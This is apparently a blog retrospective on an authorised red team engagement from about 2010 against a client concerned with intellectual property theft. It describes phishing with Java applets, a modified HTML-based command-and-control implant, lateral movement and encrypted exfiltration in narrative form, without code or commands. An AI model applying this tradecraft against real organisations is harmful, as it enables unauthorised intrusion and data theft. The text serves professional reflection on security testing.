Today I stumbled upon the tweet from Dominic Chell which was about this article that he wrote. This triggered a feeling of nostalgia of the era during which red team was still not a very familiar term with most of the clients. This triggered me to write up the story of a red team that I participated in around ~2010. To ensure that some details remain hidden, I’ve mixed in a couple of techniques from other red teams that I participated in around the same period. Although I’d almost bet that the gaps in my memory are enough to obfuscate the most important details :P
You might be wondering, why write up something old and probably with zero relevance to the actual state of defense today? The reason is exactly that, to hopefully provide insight in how clients and technology have evolved to make it more difficult for adversaries not only to get in, but to remain undetected. In addition I hope that the mistakes that we made back then enable other people to learn from.
If you feel that you are suddenly hoping that you would have done red teams back then, don’t feel sad. There is a big probability that in another ~10 years you will look back and think: Whoa, red teaming was pretty easy around ~2019.
If you enjoy stories from the past, keep on reading.
The assignment
The assignment came from a pretty cool client that was concerned about intellectual property being stolen by foreign actors. They had a couple of requirements:
-
-
- Actually steal the information
- If caught or detected, keep going
- Do the stuff the actor does
-
Not a lot of requirements right? We didn’t complain ;) It was also one of those first moments that you have to look at an actual threat actor, instead of just being the ‘creative pentester’.
The first requirement was to ensure that the message about the state of their security was brought home when presented. A more practical reason of the first requirement was that they wanted to know if their investigation would be able to identify the stolen information.
The second requirement was pretty awesome, it resulted in one of the first ‘battles’ and elevated heart beats to keep our access to the network even if detected. The only event that would end the red team was if they would be able to trace us back to the company we worked for. As long as the detections remained in the realm of ‘the attacker’ we could just carry on.
The third requirement was the one that taught us the most, since we learned that getting to your objective is not about using ‘the latest techniques’, but using those techniques that work and fit the profile of the actor. It also taught us that the biggest difference between ‘pentest’ and ‘red team’ really is patience.
Also we decided to perform this red team operation with a two person team, assisted by colleagues whenever we needed additional skills, knowledge & ideas.
Initial foothold
Our team lead gave us the assignment, the written proposal and performed a kick off with further details. After that we were on our own. So where to start?
Our first action was to order a seperate internet connection, a regular home ISP contract. Since the privacy laws in our country are pretty strict it would make tracing that IP to the company we worked for only possible for law encorcement as far as we then knew. Might be overkill, but we figured we would re-use it for future operations and in those days renewing your IP could be done by rebooting the router/modem. We also only intended to use this for simple OSINT actions and to connect to other infrastructure.
We decided to first read up on the target organization, not in the technical sense though. We performed the following actions:
-
-
- Read their website
- Search around for current news articles
- Read published articles from them
-
This gave us an idea of the type of organization that we were going to attack as well as which persons were public facing. It also provided us an idea of the type of information that they would consider ‘intellectual property’. The client had stated that they would not define that, unless we asked for a so called ‘leg up’. That is, if we would not be able to identify that on our own, then the client would provide us with specific filenames or keywords to enable us to hunt for it.
After this we started to think about the technical part. Our background was mainly pentesting (from web to internal networks and the software part of custom hardware systems). These are the options that we considered:
-
-
- Their external infrastructure
- Phishing
- Sending them hardware / dropping hardware
-
Since we had to perform stuff that the real actor also performed we had to drop the hardware option. After all, we could not find a single online public source that stated they shipped hardware to their victims. We could however find that they poked external infrastructure and that their succesful breaches seemed to all have phishing as the common attack vector.
We decide to do them both at the same time. We got ourselves some cheap VPSes, some within our country others from the presumed attacker country. We used those to scan and poke their external infrastructure. We also figured that if we triggered any detection it would allow us to gather some additional information on them. We considered the VPS stuff that we rented as throw away.
We then started to think about the phishing part, again we had a couple of options:
-
-
- Word macro
- Zip files with executables in them
- Java applets
-
We decided that the zip file option would be our last resort. You might be thinking: really? Well yes, we had actually used that one before succesfully. Just a .pdf.exe or w/e with the appropiate icon in a zip file worked great back then. So we started to develop Word documents and Java applets. Since we had no clue about the target systems we decided to do some light recon first:
-
-
- Meta data from their published files
- Technical information from their job descriptions
- Technical information from returned emails after we send them some gibberish emails
- Technical information from some of their infrastructure with verbose errors enabled
- Technical information from some spammy URLs we put out via email to some of the public addresses
-
All of this gave us enough information to base our attacks on as well as just work with some assumption. After all, being detected as ‘an attacker’ didn’t mean the end of our operation. We also used hotmail for most of the above spammy emails. Saved us the trouble of setting up our own mail server and it fit the behaviour of some spammers perfectly.
Most of the information that we collected concerned:
-
-
- Operating system
- Browser and plugins
- Employee email format, names, functions, phone numbers
- Information on out of office employees
- Limited information on possible AV
- Some information on their server park responsible for handling the sensitive information
-
By now we had most of our stuff going:
-
-
- Droppers in Java and Word
- Some targets
- No payload :(
-
So we improved bullet item two by just performing a brute force approach to verifying mail addresses against their mail server. This gave us over 500 targets, which we then just spammed to retrieve additional information on their department and their function within the company. You’d think that would have gotten us our first detection right? After the debrief, they told us that for them it just looked like yet another spam run..lol. It got one of our VPS ip addresses blacklisted on their mail server, that was the only consequence we experienced.
For the payload we decided to not re-invent the wheel, but to modify an existing one. We choose ‘insider‘. This was a pretty basic implant that was written in C and retrieved commands from a backend. We performed the following modifications:
-
-
- Rewrote the backend in PHP
- Added database support
- Added encryption
- Improved proxy aware support
- Fixed multiple minor things
-
The reason we chose this implant was because it embedded the commands and responses inside an HTML page. So we could just use a static page or proxy a real page and the evil payload would be inserted as a kind of base64 encoded comment inside the HTML. Back then we thought this was pretty nifty.
The main draw back was that it did not provide SOCKS or similar ‘pivoting’ support. Dumb us didn’t even think about implenting it?! We just adapted by rewriting tools and doing everything command based. Somehow we thought it would be stealthier that way, due to less network traffic…unsure if that was the right train of thought.
So after this we used gmail to send out a couple of phishing emails with everything setup and we got our infections. The phishings mainly exploited the natural curiousity and fear that people have. We used fake news articles that you could only view after accepting the Java applet warning. If you accepted you got infected + we immediately send back information about running processes. If you didn’t accept we collected as much information as possible within the restrictions of the Java sandbox.
The Word Macro? We never used that one :(
Network propagation
So we got a couple of infections. Our implant even had jitter / randomness, we were so afraid of triggering detecting that we used insane timeouts. Just as an example…the random wait happened after every action so:
-
-
- Random retrievel of command: random pick between 30-120min
- Random posting back of result: random pick between 20-60min
-
You might now better understand our database functionality that we added to it. It did not only allow us to manage the multiple infections, but also to prepare a whole set of commands to be batch processed. Yes, this made making mistakes a painful time waste. We avoided this by having a test setup on which we first tested our stuff.
Now let’s get on with the juicy lateral movement right? Not in the sense that we use nowadays. Since we had to get the juicy data, we did really boring stuff:
-
-
- Recursive dir listing on mounted network shares
- Search through file names
- Phish users based on ownership of the files
-
The above eventually landed us on the right workstations which contained all the juicy stuff. We also did some more traditional lateral movement, but that was mainly for persistence and looked like this:
-
-
- Code some custom executable to spawn processes, port scan, inject DLL files, scrape some memory
- Find vulnerable servers & exploit them
- We deployed a customized version of meterpreter for this on specific machines, since we needed SOCKS capabilities
- Infect them with our implant
-
Now that I’m writing this, I’m thinking how did the above ever work? Yet it worked great! Oh and yes, you noticed correctly, we didn’t become domain admin, it wasn’t necessary.
Action on Objectives
So by now we had access to the employees that worked on a daily basis with the sensitive information and we had multiple servers and workstations with persistence on them. Not all of them though. Why not? Because we had seen in some of their documents that their standard procedure was to reboot stuff in case of a potential infection. So we figured that on the machines that we performed the loudest actions, we would not install persistence. That way if the user reported something there would be no weird network or startup behaviour after the reboot. Yes our files would still be on disk, but we crossed our fingers that our hidden location would remain hidden.
We had read that the real actor would exfiltrate the data by zipping it up. So we did the same-ish thing. The real actor collected the information in a single place, zipped it and then exfiltrated. We decided to collect in a single place (one of our infections had all the privs we needed for the network shares). Instead of zip and exfiltrate we decided to zip, gpg and exfiltrate. Why? Because we didn’t trust our dev skills or ourselves to be able to implement encryption in a sane manner for our implant. Since after all we are a red team and not the real actor, we didn’t want to endanger the client’s information. So you might be sensing where this is going….we uploaded gpg windows binaries to a single workstation and used that with a public key to protect the data before exfiltrating it.
If you are wondering why we trusted the encryption to be good enough for all the other stuff that we did with the C2…well we didn’t. We discussed this with the client and performed a worst case analysis and the client accepted the risk.
Closing thoughts
After performing the above red team and having a debrief with the customer, here are some of the lessons learned:
Client perspective
-
-
- The threat was taken seriously
- Stuff they thought impossible was proven
- Detection on specific choke points was improved
- Capability on being able to identify the impact of an attacker was improved (knowing what the attacker stole / did)
-
The remark I remember the most was something along the lines of ‘stealing the information is what convinced upper management’. Again technical privileges and awesomness means nothing if you are not able to proof business impact. On our side we had like a zillion improvements to make, so we just created a list, prioritised and started implementing the improvements.
A lot has changed since then, but the need for companies to practice and learn will always remain in my personal opinion. I hope you enjoyed reading a tale of a red team that happened ~10 years ago.